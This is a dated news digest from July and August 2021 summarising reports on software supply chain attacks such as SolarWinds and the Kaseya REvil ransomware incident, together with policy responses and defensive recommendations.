Analysis of several recent examples of supply chain attacks shows that adversaries are often either manipulating the code signing procedures via compromised but legitimate digital signing of certificates, hijacking the update distribution network of an ISV solution, or compromising original source code. The majority of the attackers have a high sophistication level, with the exception of the recent Kayesa attack, which leveraged an external facing service with known vulnerabilities.

Ref - SentinelOne 

_______________________________________________________________________________________

(Aug 2, 2021)

The supply chain effect in increasingly connected world

Larger supply chains are a consequence of our increasingly connected world, and feature in almost every industry from vehicle manufacturing to Dairy companies. Supply chain intermittencies and cyber-attacks that propagate through vendor-customer relations showcase that there are plenty of concerns due to the lack of accounting for the increasingly complex interconnected systems that make up our society.

Ref - Medium

_______________________________________________________________________________________

(Aug 2, 2021)

Supply chain cyber attacks expected to quadruple, says EU agency

The European Union Agency for Cybersecurity (ENISA) has found that 66 percent of supply chain attacks focus on the supplier’s code. ENISA says strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers. This is evidenced by the increasing impact of these attacks such as downtime of systems, monetary loss and reputational damage.


_______________________________________________________________________________________

(August 1, 2021)

Top US prosecutors hit by suspected Russian hack

The attack on users of the software SolarWinds - which the US has blamed on Russia - was the worst-ever cyber-espionage attack on the US government. The department says 27 US attorneys had at least one office computer hacked. That has raised fears the hackers may have accessed sensitive information, including the names of informants.

Ref - BBC

_______________________________________________________________________________________

(July 31, 2021)

Organizations should validate third-party code before using it - Euro body

Half of the publicly reported supply-chain attacks were carried out by well-known APT groups, according to an analysis by EU infosec agency ENISA, which warned such digital assaults to need to drive new protective methods. Of the 24 supply-chain attacks studied by ENISA since January 2020, a dozen were attributed to APTs while 10 of them hadn't been attributed to anyone at all in open-source reporting, the agency said.

Ref - The Register 

_______________________________________________________________________________________

(July 30, 2021)

Ransomware exploits and supply chain attacks lead the cyber trends in the H1 2021

Global cyber attacks increased by 29%, as hackers continue to exploit the COVID-19 pandemic and shift to remote work. The well-known SolarWinds supply chain attack stands out in 2021 due to its scale and influence, but other sophisticated supply chain attacks have occurred such as Codecov in April, and most recently, Kaseya.

Ref - Check Point 

_______________________________________________________________________________________

(July 30, 2021)

There is no silver bullet for ransomware or supply chain attacks

Aaron Portnoy, the principal scientist at attack surface management specialists Randori, confesses to periodic bouts of imposter syndrome, despite having carved out a distinguished career in offensive security. According to him, the industry is witnessing dramatic changes, and there is a need for some change of approach for keeping pace with increasingly sophisticated attackers.

Ref - PortSwigger 

_______________________________________________________________________________________

(July 30, 2021)

Providers with robust cybersecurity programs also struggling with supply chain problems

According to a recent industry report, less than a quarter of hospitals, accountable care organizations (ACOs), and other healthcare providers demonstrated acceptable conformance with established framework standards. Provider organizations’ primary shortcoming in this area was their ability to validate whether their third-party suppliers and other partners are in line with their contractual security obligations.


_______________________________________________________________________________________

(July 30, 2021)

House committee approves K-12 cyber, DHS supply chain bills

The House Committee on Homeland Security approved two cybersecurity-focused bills – the K-12 Cybersecurity Act and the DHS Software Supply Chain Risk Management Act of 2021 – during a markup on July 28. The DHS Software Supply Chain Risk Management Act of 2021 aims to protect the Department of Homeland Security’s (DHS) networks from cyberattacks by modernizing how the Department procures information and communications technology or services (ICT(S)).

Ref - MeriTalk

_______________________________________________________________________________________

(July 29, 2021)

Ransomware exploits and supply chain attacks lead the cyber trends 2021

The well-known SolarWinds supply chain attack stands out in 2021 due to its scale and influence, but other sophisticated supply chain attacks have occurred such as Codecov in April, and most recently, Kaseya. CPR also identified security flaws that would have allowed an attacker to get access to the Atlassian Jira bug system, with just one click, and get sensitive information, such as security issues on Atlassian cloud, Bitbucket, and on-premise products.

Ref - Check Point 

_______________________________________________________________________________________

(July 29, 2021)

Key recommendations to protect yourself from supply chain attacks

Before a decision to use a supplier is made, a full risk assessment is suggested if resources are available. You can meet the supplier's security manager or CISO, evaluate the supplier's IT resources, and ask suppliers how they prioritize risk. With this, you will get the ability to identify the risks associated with a particular supplier.


_______________________________________________________________________________________

(July 29, 2021)

Understanding the increase in supply chain security attacks

According to the new ENISA report - Threat Landscape for Supply Chain Attacks, which analyzed 24 recent attacks, strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers. This is evidenced by the increasing impact of these attacks such as downtime of systems, monetary loss, and reputational damage.


_______________________________________________________________________________________

(July 29, 2021)

Supply chain security affects organizations everywhere

supply chains offer to cybercriminals a single point of failure, and multiple attack paths to exploit. Often, attackers look for a smaller organization with fewer or laxer security measures that is part of the supply chain as an entry point. Then get access to the entire network, and the ripple effect means catastrophic consequences. 


_______________________________________________________________________________________

(July 29, 2021)

The big takeaway from the Kaseya supply chain/ransomware cyberattack

What everyone is learning after every new supply chain attack is that the battlefield on which organizations are on is considerably larger than previously imagined. The effectiveness of these supply chain shocks shows that our enterprises are also individual nodes of a much bigger macro-network. It’s a battlefield so large that drawing up a strategic defense using conventional tools and tactics won’t work.

 
_______________________________________________________________________________________

(July 28, 2021)

Cybersecurity in supply chain management - Key risks to consider

A cybersecurity strategy depends heavily on the steps the supply chain company team takes. These four steps can help the company implement cybersecurity strategies to improve its supply chain risk management approach: fully understand the threat to the supply chain business, assess the cybersecurity measures, improve current measures and treat cybersecurity as an ongoing process.


_______________________________________________________________________________________

(July 28, 2021)

Top officials urge Commerce Department to confront growing cybersecurity risks

U.S. Sens. Roger Wicker, R-Miss., and Maria Cantwell, D-Wash., ranking member and chair of the Senate Committee on Commerce, Science, and Transportation, sent a letter urging Department of Commerce (DOC) Secretary Gina Raimondo to implement and appropriately resource Congressional direction on growing the cybersecurity workforce. According to them, DOC should continue addressing cybersecurity supply chain risk, including by updating and, as appropriate, encouraging the adoption of software supply chain best practices.


_______________________________________________________________________________________

(July 28, 2021)

Where does the SME fit into a supply chain attack?

SMEs like MEDoc and Inbenta are frequently the target of supply chain attacks. Firstly, they are unlikely to have the security resources of the bigger companies they supply, so they are targeted as a stepping stone for larger attacks against bigger customers. But they are also targeted via their own supply chains. With supply chain attacks being a major growth area for cybercriminals, this is a worsening scenario.


_______________________________________________________________________________________

(July 27, 2021)

With software supply chain security, developers have a big role to play

Securing the software supply chain entails knowing exactly what components are being used in the software products, everything that impacts the code as it goes from development to production. This includes having visibility into even the code you didn't write, like open-source or third-party dependencies, or any other artifacts, and being able to prove their provenance.

Ref - Google

_______________________________________________________________________________________

(July 27, 2021)

Kaseya denies ransomware payment as it hails ‘100% effective’ decryption tool

Kaseya has denied rumors that it paid a ransom to the REvil cybercrime gang as it continues to roll out a decryptor to victims of a recent ransomware attack. The update sparked speculation as to the identity of the unnamed third party, with Allan Liska of Recorded Future’s CSIRT team positing a disgruntled REvil affiliate, the Russian government, or that Kaseya themselves had paid the ransom.

Ref - Portswigger 

_______________________________________________________________________________________

(July 27, 2021)

Protecting the supply chain from Kaseya-like attacks

To protect from Kaseya-like attacks, the end customer should have a solid understanding of their entire software bill of materials(SBOM) and have a regular dialog with its suppliers on current security posture and improvements. Dialog, not dictation, is important here. A component of understanding one’s supplier network is reducing it where possible.

Ref - Medium

_______________________________________________________________________________________

(July 27, 2021)


How network segmentation can protect supply chains from ransomware attacks

Network segmentation has proven helpful in mitigating common ransomware attacks especially those arising from breached IoT devices, third-party vendors, and the like. Part of this has to do with the main benefits of network segmentation. It eliminates network congestion, resulting in overall improved performance, and improves intrusion control by making it easy to contain detected threats. Moreover, it minimizes access to specific sensitive data and information by zoning them to a more secure network.


_______________________________________________________________________________________

(July 26, 2021)


Why code signing best practices are vital to hardening security?

Code signing, and the process of establishing and ensuring trust, has become more critical alongside the growing reliance on software that users purchase from third-party vendors and build and deploy within their own organizations using everything from PowerShell and Bash scripts to containers, libraries, files, and executables.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 26, 2021)


When software updates get hacked

The attack against Kaseya — attributed to the Russia-linked REvil ransomware-as-a-service (RaaS) group — is part of a trend of cybercriminals and espionage operators targeting the suppliers of administrative software used by companies to manage their environments.

Ref - Dark Reading 

_______________________________________________________________________________________

(July 23, 2021)


Supply-chain threats and client-side vulnerabilities

The software supply chain attacks that target applications are growing in large part because the attack surface for these threats has exploded. And that is the result of the latest trends in app development. Evolving client-side app protection technologies are an important factor in reducing cyber risk.

Ref - Barracuda 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya Ransomware attack explained

REvil attacked Kaseya’s VSA SaaS platform using zero-day exploits to gain access and distribute malicious software to their customers and their systems. From there, the ransomware gang began using weaknesses on those systems to encrypt everything. Since the malware is already wrapped in the platform, it’s been signed by Kaseya’s platform. As a result, the malware is getting past everything on these client’s systems.

Ref - PurpleSec

_______________________________________________________________________________________

(July 23, 2021)

The lessons to be learned from the Colonial Pipeline attack

The Colonial Pipeline attack – coupled with the backlash in the wake of both the SolarWinds and Codecov attacks – has led many to wonder if the executive order is enough. This unease has prompted top executives from firms like Microsoft, Amazon and Cisco to call for an international coalition to combat the global increase in ransomware.

Ref - TechRadar 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya gets master decryptor to help customers still suffering from REvil attack

Kaseya said it has obtained a decryptor that should successfully restore data encrypted during the Fourth of July weekend attack. Kaseya spokeswoman Dana Liedholm described the source of the decryptor as a trusted third party, declining to elaborate or comment on whether a ransom was paid.


_______________________________________________________________________________________

(July 23, 2021)

Getting ahead of supply-chain risks

Supply chains have become so global has created new risk in terms of the reliability and the availability of certain things. To make sure that these supply chains are properly managed, it’s important to understand where the risk is, getting ahead of it, and anticipating security needs and addressing them before they become problems.

Ref - McKinsey 

_______________________________________________________________________________________

(July 22, 2021)

Tracking the trail of software: The key to boosting security

There is an emerging set of best practices that Google and other software companies have developed in collaboration with the U.S. government to help deliver more secure software. The key is to be able to ensure a ‘certified and known’ good version of the software at any given time, down to the very smallest component code.

Ref - Forbes 

_______________________________________________________________________________________

(July 22, 2021)

DevSecOps: The key to securing supply chain in a multi-cloud threatscape

DevSecOps is all about: leveraging your CI/CD platform and containers, increasing testing and scanning across the SDLC, and minimizing manual security measures with AI/ML. Businesses that employ a DevSecOps framework will not only bolster breach prevention, they will add business value as they deliver safer products and services that better protect their businesses and customers.

Ref - InfoQ

_______________________________________________________________________________________

(July 22, 2021)


Things that changed after the SolarWinds attack

One of the most significant impacts of the SolarWinds attack has been that cybersecurity is finally getting the attention it deserves at the highest levels of the U.S. government. It is spurring real changes in policy and actions among the public and private sectors. Organizations must take the lessons learned from this attack seriously and quickly move to improve resiliency and strengthen their own cybersecurity practices.

Ref - Trustwave 

_______________________________________________________________________________________

(July 22, 2021)

Who is responsible for improving security in the software development environment?

Venafi announced the findings of a global survey that evaluates the impact of software supply chain attacks like SolarWinds/SUNBURST, CodeCov, and Kaseya/REvil on how development organizations are changing their approach to securing software build and delivery environments.


_______________________________________________________________________________________

(July 21, 2021)


New bill would make some companies report cyberattacks to the government

A new bill unveiled Wednesday would make some companies tell the government when they’ve been hacked. The bipartisan Cyber Incident Notification Act is a response to the recent attacks on SolarWinds, which impacted government agencies, and Colonial Pipeline, which disrupted access to fuel across a large region of the country. Since then, ransomware attacks — where hackers encrypt files until a victim pays a ransom — have proliferated.

Ref - CNBC 

_______________________________________________________________________________________

(July 21, 2021)

Following SolarWinds & Colonial hacks, a new Bipartisan Cyber Reporting Bill introduced

A new bipartisan Cyber Incident Notification Act of 2021 would require federal government agencies, federal contractors, and critical infrastructure operators to notify the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA) when a breach is detected. With this, the U.S. government can mobilize to protect critical industries across the country.

Ref - Senate.gov 

_______________________________________________________________________________________

(July 21, 2021)

A risk management cybersecurity imperative for State, Local & Tribal Governments

The cyber-attack using the SolarWinds vulnerability raised alarms throughout the federal government as many agency networks data were presumably compromised. The extent of the damage from Solar Winds (and other recent breaches) is still being investigated and mitigated. The cyber breach not only impacted federal systems, but also the state, local, and Tribal governments (SLTG) and databases.

Ref - Forbes 

_______________________________________________________________________________________

(July 20, 2021)

Why securing against IT supply chain attacks is crucial

Given the prevalence of the software being targeted in the supply chain attacks, it’s more about securing any company’s internal environment from supply chain attacks, rather than securing the supply chain itself. As attacks against these building blocks increasingly become a key part of threat actors’ playbook, taking proper steps to secure the enterprise’s IT supply chain is crucial to maintaining an effective cybersecurity program.

Ref - Medium 

_______________________________________________________________________________________

(July 20, 2021)

Top 5 things to know about supply chain attacks

There are 5 key things to know about supply chain attacks. It doesn’t attack the victims directly, but it targets its suppliers. It can affect almost any industry, including Financial, energy, manufacturing, transportation. It may or may not involve either hardware or the internet. Attackers often try to compromise open source development or distribution to gain a foothold in companies. Moreover, there are several possible ways to safeguard against such threats.

Ref - TechRepublic 

_______________________________________________________________________________________

(July 19, 2021)


How to prevent supply chain attacks by securing DevOps

With threat actors focusing more intently on supply chain attacks, building security into the development process becomes mission-critical. Software developers need to embrace DevSecOps to prevent their applications from being used in a supply chain attack. They can do this by creating standards that ensure coding best practices, especially when third-party code is involved.


_______________________________________________________________________________________

(July 19, 2021)

Biden Administration blames hackers tied to China for Microsoft cyberattack spree

The Biden administration publicly blamed hackers affiliated with China’s main intelligence service for a far-reaching cyberattack on Microsoft Corp. email software this year, part of a global effort by dozens of nations to condemn Beijing’s malicious cyber activities. The U.S. government has high confidence that hackers tied to the Ministry of State Security, or MSS, carried out the unusually indiscriminate hack of Microsoft Exchange Server software that emerged in March, senior officials said.


_______________________________________________________________________________________

(July 19, 2021)

Breaking down the threat of going all-in with Microsoft security

Recent cyber events over the last several months have highlighted a critical need for enterprises to break free from depending on one vendor for security to limit risk. Having an unsegmented body of the ship means it would be prone to sinking very quickly when damaged. On the other hand, companies that segment their security infrastructure with multiple vendors are like ships with several compartments. When one area is compromised, the whole ship isn't immediately exposed.

Ref - Darkreading 

_______________________________________________________________________________________

(July 19, 2021)

Kaseya ransomware attack FAQ

According to Kaseya CEO Fred Voccola, less than 0.1% of the company's customers were embroiled in the breach -- but as their clientele includes MSPs, this means that smaller businesses have also been caught up in the incident. Present estimates suggest that 800 to 1500 small to medium-sized companies may have experienced a ransomware compromise through their MSP.

Ref - ZDNet 

_______________________________________________________________________________________

(July 18, 2021)

Password attacks on Microsoft highlight the need for Passwordless Zero Trust Systems

President Biden, the National Security Agency, and the Department of Defense have all made major public statements encouraging companies to move from traditional perimeter defense-based systems to Zero Trust systems. The policy is shifting for federal contractors such that Zero Trust is quickly becoming not just an option, but the regulation standard. Other industries must follow suit to protect their financial interests, intellectual property, and reputations.


_______________________________________________________________________________________

(July 17, 2021)

CloudFlare CDNJS bug could have led to widespread supply-chain attacks

Web infrastructure and website security company Cloudflare last month fixed a critical vulnerability in its CDNJS library that's used by 12.7% of all websites on the internet. The weakness concerned an issue in the CDNJS library update server that could potentially allow an attacker to execute arbitrary commands, leading to a complete compromise


_______________________________________________________________________________________

(July 16, 2021)

Several security pros not confident about supply chain attack security - Report

According to a new report from machine identity management firm Venafi, many security pros aren't confident they could repel a major supply chain attack. Polling more than 1,000 information security professionals, developers, and executives in the IT and software development industries for the report, Venafi found that almost half (48%) believe security teams are responsible, with the exact percentage also saying their development teams are responsible.


_______________________________________________________________________________________

(July 16, 2021)

Kaseya attack - How to fight this unique attack technique

Kaseya attack is different from other usual ransomware attacks. It started with a zero-day, and that's unusual. It's hard to say best practice in terms of avoiding this. Moreover, the companies that were infected, were following best practices. There were some mistakes like the platform being used shouldn't have been exposed to the internet. It was mostly exposed so that people could remote work because of the pandemic and to make more online availability. And it looks like that there was an overuse of what are called endpoint protection exclusions.


_______________________________________________________________________________________

(July 15, 2021)

With software supply chain attacks escalating, who is responsible for increasing security

According to Venafi’s survey, respondents nearly unanimously agree (97%) that the techniques and procedures used to attack the SolarWinds software development environment will be reused in new attacks this year. Despite this certainty, there is no alignment between security and development teams on which team should be responsible for improving security in the software build and distribution environments.

Ref - Yahoo

_______________________________________________________________________________________

(July 15, 2021)

iOS zero-day let SolarWinds hackers compromise fully updated iPhones

The Russian state hackers who orchestrated the SolarWinds supply chain attack last year exploited an iOS zero-day as part of a separate malicious email campaign aimed at stealing Web authentication credentials from Western European governments. Attacks targeting CVE-2021-1879, as the zero-day is tracked, redirected users to domains that installed malicious payloads on fully updated iPhones.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 14, 2021)

Targeted attack activity heightens need for firms to patch new SolarWinds flaw

Organizations that have not yet patched against a critical remote code execution vulnerability disclosed this week in SolarWinds' Serv-U file transfer technology for Windows might want to do so quickly. Microsoft is presently tracking the attacker as DEV-0322. The group has used commercial VPN technologies and compromised consumer routers in previous attack activities.

Ref - Darkreading 

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers threat actor targeting SolarWinds software

Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

Ref - Microsoft

_______________________________________________________________________________________

(July 13, 2021)

Identity administration platform may be the weak link post-RMM supply-chain attack

Recent ransomware attacks that used a compromised Remote Monitoring and Management (RMM) platform to access and push the malicious executables to endpoints are forcing security teams to re-evaluate such centralized platforms with very large blast radius. Such issues have again shown the need for the organizations to move to infrastructure designed with Zero-trust principles in mind.

Ref - Medium

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers critical SolarWinds zero-day under active attack

An attacker can gain privileged access to exploited machines hosting Serv-U products and could then install programs; view, change or delete data; or run programs on the affected system. The vulnerability exists in the latest Serv-U version 15.2.3 HF1, released on May 5, and all prior versions.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 12, 2021)

SolarWinds patches critical Serv-U vulnerability exploited in the wild

SolarWinds is urging customers to patch a Serv-U remote code execution vulnerability exploited in the wild. According to SolarWinds, "if SSH is not enabled in the environment, the vulnerability does not exist." SolarWinds has addressed the security vulnerability reported by Microsoft with the release of Serv-U version 15.2.3 hotfix (HF) 2.


_______________________________________________________________________________________

(July 12, 2021)

SolarWinds confirms new zero-day flaw under attack

In a recent advisory, SolarWinds said a single threat actor exploited security flaws in its Serv-U Managed File Transfer and Serv-U Secure FTP products against a limited, targeted set of customers. This zero-day is new and completely unrelated to the SUNBURST supply chain attacks.

Ref - SecurityWeek 

_______________________________________________________________________________________

(July 11, 2021)

JustTech and its clients impacted in Kaseya supply-chain ransomware attack

JustTech disclosed that the company and its clients were victims of the recent cyber-attack that has been reportedly attributed to a criminal gang in Russia known as REvil. For JustTech, it is believed the cyber-attack began at 12:31 PM Eastern Standard Time on Friday, July 2nd. JustTech discovered the breach, disabled, and shut down the affected servers within 8 minutes.

Ref - JustTech 

_______________________________________________________________________________________

(July 9, 2021)

Securing the supply chain: Lessons learned from the Codecov compromise

Rapid7 researchers provided the security community with defensive knowledge and techniques to protect against supply chain attacks involving continuous integration (CI) systems, such as Jenkins, Bamboo, etc., and version control systems, such as GitHub, GitLab, etc. It covers prevention techniques — for software suppliers and consumers — as well as detection and response techniques in the form of a playbook.

Ref - Rapid7
 
_______________________________________________________________________________________

(July 9, 2021)

SolarWinds Serv-U remote memory escape vulnerability

SolarWinds was recently notified by Microsoft of a security vulnerability (CVE-2021-35211) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. Microsoft’s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor.

Ref - Solarwinds 

_______________________________________________________________________________________

(July 8, 2021)

Kaseya left its customer portal vulnerable to a 2015 flaw in its own software

On July 3, security incident response firm Mandiant notified Kaseya that their billing and customer support site —portal.kaseya.net — was vulnerable to CVE-2015-2862, a “directory traversal” vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser. As its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya’s customer portal was still exposed to the data-leaking weakness.


_______________________________________________________________________________________

(July 8, 2021)

FERC and NERC publish a whitepaper on SolarWinds and related supply chain compromise

On July 6, 2021, the staff of the FERC and the NERC E-ISAC issued a whitepaper entitled ““SolarWinds and Related Supply Chain Compromise – Lessons for the North American Electricity Industry.” The whitepaper describes these major supply chain-related cybersecurity events and the key actions to take to secure systems.

Ref - JD Supra 

_______________________________________________________________________________________

(July 8, 2021)

NJCCIC recommendations on widespread supply chain ransomware attack

The NJCCIC recommends MSPs using VSA follow the guidance from Kaseya and disconnect VSA servers until notified by Kaseya that it is safe to connect them after an update is applied to remediate the exploited vulnerability. A tool to scan systems for signs of exploitation is available and the incident overview and technical details are also provided by Kaseya on their website.

Ref - NJCCIC 

_______________________________________________________________________________________

(July 8, 2021)

Analyzing Supply Chain Attacks

While software vulnerabilities still play a role in breaching organizations’ defenses, the software supply chain introduces an inordinate degree of new opportunities to introduce malicious artifacts and to execute unauthorized activities from within. It is important to note that malware is not a vulnerability, so it can neither be detected nor resolved using the same methods.

Ref - AquaSec 

_______________________________________________________________________________________

(July 8, 2021)

Global ransomware supply-chain attack takes a small Maryland town offline

Leonardtown, a town in Maryland, had been a victim of the massive ransomware attack that breached a popular software made by the information technology company Kaseya. The attack reached Leonardtown through its IT management company, JustTech, which uses the affected Kaseya product.


_______________________________________________________________________________________

(July 7, 2021)

REvil Ransomware Attack on Kaseya VSA - Detailed technical analysis

Unlike previous attacks by REvil where the dwell time was very long and data was carefully exfiltrated prior to detonating ransomware, this attack appears to have happened very quickly. It appears that the threat actors knew they were racing against the development of a patch. Security researcher Victor Gevers and the team at DIVD.nl disclosed the vulnerability to Kaseya and had been working with them on a patch, but REvil beat them to the punch.

Ref - Varonis 

_______________________________________________________________________________________

(July 7, 2021)

Analyzing the REvil Ransomware attack

In the recent attack on Kaseya, the ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server platform. Security researchers have identified three zero-day vulnerabilities potentially used in attacks against their clients, including Authentication Bypass Vulnerability, Arbitrary File Upload Vulnerability, and Code Injection Vulnerability.

Ref - Qualys 

_______________________________________________________________________________________

(July 7, 2021)

The massive Kaseya ransomware attack - Key things to know and learn

The attack on Kaseya points to a popular target for ransomware attackers: Managed Service Providers. MSPs such as Kaseya's customers allow companies to outsource certain software and services, such as IT management, to third parties, which can help avoid the cost of having to employ such experts in-house.

Ref - CNN 

_______________________________________________________________________________________

(July 7, 2021)

In the Kaseya supply chain ransomware attack, history repeats itself

Though details of the recent international ransomware campaign (via Kaseya) are still emerging, the attack patterns are reminiscent of the mega Cloud Hopper attack, a years-long cyber invasion that was first uncovered in 2016 and targeted the world’s largest technology service providers and their customers.

Ref - CyberArk 

_______________________________________________________________________________________

(July 7, 2021)

Deconstructing the REvil Ransomware attack on Kaseya VSA

After gaining access to VSA, the attackers created a fake malicious automated update called “Kaseya VSA Agent Hot-fix,” then pushed it to VSA servers in Kaseya’s clients’ networks. Kaseya VSA administrative access was disabled to the compromised servers and the notorious REvil (aka Sodinokibi) ransomware was delivered to other machines in their networks.


_______________________________________________________________________________________

(July 7, 2021)

Kaseya VSA ransomware attack, SolarWinds hack share many similarities

Last weekend’s Kaseya VSA supply chain ransomware attack and last year’s giant SolarWinds hack share a number of similarities. The attacks on Kaseya and SolarWinds share the most “sinister point” of compromise. That’s the trust between a vendor and a client. Key among the differences, however, is that the exploit of the Kaseya VSA product led to the injection of ransomware into the endpoints managed by Kaseya VSA on-premises users, while the SolarWinds attack led to data exfiltration.


_______________________________________________________________________________________

(July 7, 2021)

REvil ransomware gang’s major supply chain attack may affect over 1,500 customers

Although it was initially believed that only 50 companies using VSA on-premises were targeted by REvil, the evolving situation reveals more potential victims as numbers climb to the tune of 1,500-2,000 companies likely exposed to downstream impact by this major attack. The number of potential victims can be so much larger because Kaseya’s customers themselves are MSPs who serve a customer base of their own.


_______________________________________________________________________________________

(July 6, 2021)

The key lessons from Kaseya cyber attack

The solution to the Kaseya attack is more than detection and protection. It requires policy, regulations, law enforcement, diplomacy, criminal ecosystem disruption, and reducing the benefit of the crime.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers breached RNC via Synnex in a new attack

The Russian government hackers behind the SolarWinds campaign breached the computer systems of the Republican National Committee through Synnex in a new attack. There is no indication, however, that the RNC itself was hacked or that any RNC information was stolen.

Ref - CRN 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya ransomware: a software supply chain attack or not?

The newly discovered vulnerability, initially known only to the attackers, allowed them to exploit the on-premise version of the Kaseya software, and ultimately conduct the ransomware attack. And, because so many of Kaseya's customers are MSPs, the attackers were able to pass the ransomware attack downstream to as many as 1,500 small and medium-size businesses that outsource everyday IT functions.

Ref - Sonatype 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya says it's seen no sign of a supply chain attack

Kaseya has said it’s been unable to find signs its code was maliciously modified and offered its users a ray of hope with the news that it is testing a patch for its on-prem software and is considering restoring its SaaS services on Tuesday.


 _______________________________________________________________________________________

(July 6, 2021)

How can a business ensure the security of its supply chain?

The reality is that supply chain attacks are not going away. In the first quarter of 2021, 137 organizations reported experiencing supply chain attacks at 27 different third-party vendors, while the number of supply chain attacks rose 42% from the previous quarter. Therefore, it becomes important for businesses to mitigate risk when it comes to the increased threat from supply chain attacks.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers still targeting Microsoft, focus on support staff

Microsoft's Threat Intelligence Center's investigation detected information-stealing malware on a machine belonging to one of Microsoft's customer support agents with access to basic account information for a small number of our customers. The actor used this information in some cases to launch highly targeted attacks as part of their broader campaign.


_______________________________________________________________________________________

(July 6, 2021)

Kaseya supply chain ransomware attack - Technical analysis

The threat actor behind this attack identified and exploited a zero-day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypts files on the affected systems.

Ref - ZScaler
 
_______________________________________________________________________________________

(July 6, 2021)

Ransomware group connected to JBS incident thought to be behind massive MSP supply chain attack

While most Americans were preparing for the July 4 holiday weekend by picking up burgers and beers, the hackers thought to be responsible for the JBS ransomware incident were readying a supply chain attack timed to hit when IT workers were off duty. An attack on managed service providers (MSPs) making use of Kaseya products is thought to have compromised at least 200 of that company’s clients, and possibly as many as tens of thousands in total.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 5, 2021)

New supply chain ransomware attack targets

The sophisticated supply-chain ransomware attack targeting Kaseya initially leveraged a vulnerability in the Kaseya VSA software to gain access to victim organizations and then used REvil’s RaaS to infect those organizations with ransomware. Reports claim that a malicious update was deployed to the Kaseya VSA interface by the threat actors as an update or hotfix for the Kaseya VSA agent.

Ref - Fortinet 

_______________________________________________________________________________________

(July 5, 2021)

Kaseya crippled by supply chain attack

REvil compromised Kaseya VSA servers and is currently using them to deploy and distribute their ransomware. The ransomware encryptors are contained in the file agent.exe. When this file is activated, both an old yet legitimate copy of Windows Defender MsMpEng.exe, and the encryptor payload mpsvc.dll. are dropped into the C:\Windows path to DLL sideload - a process where a malicious DLL file is loaded in place of a legitimate one.

Ref - Upguard 

_______________________________________________________________________________________

(July 5, 2021)

Real-time prevention of the Kaseya VSA supply chain REvil ransomware attack

In the Kaseya attack, most of the attacked endpoints were Windows servers. This attack is particularly evasive because all the attack chain components are signed with digital certificates, starting from the Kaseya process, continuing with a vulnerable Microsoft Defender process, and ending with the side-loaded signed ransomware.

Ref - Morphisec 

_______________________________________________________________________________________

(July 5, 2021)

Over 1000 organizations globally attacked on Fourth of July weekend, biggest supply chain attack since Sunburst

To breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack. 

Ref - CheckPoint

_______________________________________________________________________________________

(July 5, 2021)


US spy agencies investigate Kaseya supply chain attack

President Biden has ordered his intelligence agencies to investigate a major ransomware supply chain attack over the weekend that targeted a vendor of IT software used by managed service providers (MSPs). Suspected to be the work of a REvil affiliate, the attack on Miami-headquartered Kaseya was spotted by its incident response team at around midday on Friday.


_______________________________________________________________________________________

(July 5, 2021)

Hackers’s sophisticated ransomware attack targeted a flaw in IT management

The hackers behind a mass ransomware attack exploited multiple previously unknown vulnerabilities in IT management software made by Kaseya Ltd., the latest sign of the skill and aggressiveness of the Russia-linked group believed responsible for the incidents.

Ref - Fortune 

_______________________________________________________________________________________

(July 5, 2021)


IT for Kaseya defers decision about SaaS restoration after supply chain attack

IT management software provider Kaseya has deferred an announcement about the restoration of its SaaS services, after falling victim to a supply chain attack that has seen its products become a delivery mechanism for the REvil ransomware. On learning of the attack, Kaseya urged customers to pull the plug on their VSA servers, because the attack shuts off administrator access to the suite. The company also shuttered its SaaS services as a precautionary measure.

Ref - The Register 

_______________________________________________________________________________________

(July 4, 2021)

Guidance for MSPs and their customers affected by the Kaseya VSA supply-chain

CISA and FBI recommend MSP customers affected by the Kaseya VSA supply-chain attack take immediate action to implement cybersecurity best practices. They are recommended to download and use the Kaseya VSA Detection Tool. Agencies also recommend enabling and enforcing multi-factor authentication (MFA) on every single account that is under the control of the organization.

Ref - US Cert 

_______________________________________________________________________________________

(July 4, 2021)

Kaseya supply chain attack targeting MSPs to deliver REvil ransomware

The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.

Ref - TrueSec

_______________________________________________________________________________________

(July 4, 2021)

How Russian spies hacked the Justice, State, Treasury, Energy and Commerce Departments

The Department of Homeland Security spent billions on a program called "Einstein" to detect cyber attacks on government agencies. The Russians outsmarted it. They circumvented the NSA, which gathers intelligence overseas, but is prohibited from surveilling U.S. computer networks. So the Russians launched their attacks from servers set up anonymously in the United States.

Ref - CBS News 

_______________________________________________________________________________________

(July 4, 2021)

